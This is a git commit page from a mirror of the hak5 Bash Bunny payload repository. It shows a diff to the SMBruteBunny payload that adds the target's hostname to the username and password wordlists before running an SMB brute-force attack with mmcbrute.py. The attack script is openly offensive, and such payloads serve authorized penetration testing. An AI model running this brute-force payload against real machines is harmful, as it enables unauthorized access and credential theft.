hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

A little nasty trick! 

Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.
pull/383/head
Mohamed A. Baset 2019-05-30 01:43:13 -05:00 committed by GitHub
parent b3537e7a65
commit 92f1be3a52
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
payloads/library/credentials/SMBruteBunny/payload.txt
View File

@ -17,6 +17,10 @@ mount /dev/nandf /root/udisk/
GET TARGET_IP
GET TARGET_HOSTNAME
# A little trick: Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.
echo $TARGET_HOSTNAME >> $user_bruteforce_list
echo $TARGET_HOSTNAME >> $pass_bruteforce_list
# Perform SMB bruteforce attack
LED STAGE1
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file